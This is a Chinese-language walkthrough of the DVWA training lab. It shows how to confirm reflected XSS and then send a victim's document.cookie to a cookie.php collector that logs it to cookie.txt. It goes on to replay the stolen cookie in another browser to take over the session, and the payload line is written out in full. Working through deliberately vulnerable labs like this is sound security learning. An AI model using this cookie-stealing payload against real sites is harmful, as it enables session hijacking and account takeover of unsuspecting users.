dvwa下利用xss获取cookie并利用

首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

dvwa下利用xss获取cookie并利用

这里就以low级别进行操作

dvwa下利用xss获取cookie并利用

 选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

dvwa下利用xss获取cookie并利用

 确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:\wamp\www(仅供参考)

dvwa下利用xss获取cookie并利用

 目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

接下来需要根据题目构造js语句

<script>document.location=‘http://127.0.0.1/cookie.php?cookie=‘+document.cookie;</script>

将js语句输入,提交,成功的话会跳转到另一个界面

dvwa下利用xss获取cookie并利用

 现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

dvwa下利用xss获取cookie并利用

 另外能够看到浏览器url框内有一个cookie的值

dvwa下利用xss获取cookie并利用

 获取到cookie后打开另外一个浏览器访问dvwa(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值

dvwa下利用xss获取cookie并利用

将之前获取到的cookie值给替换上去,把security的impossible改为low,回到登录界面,在url后面加上获取到的cookie信息

 dvwa下利用xss获取cookie并利用

 dvwa下利用xss获取cookie并利用

 ok,已经成功利用获取到的cookie进行登录

另外划重点,这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

这个文档仅供学习参考,任何读者用来做坏事,后果自负!!!

重要的事说三遍

相关推荐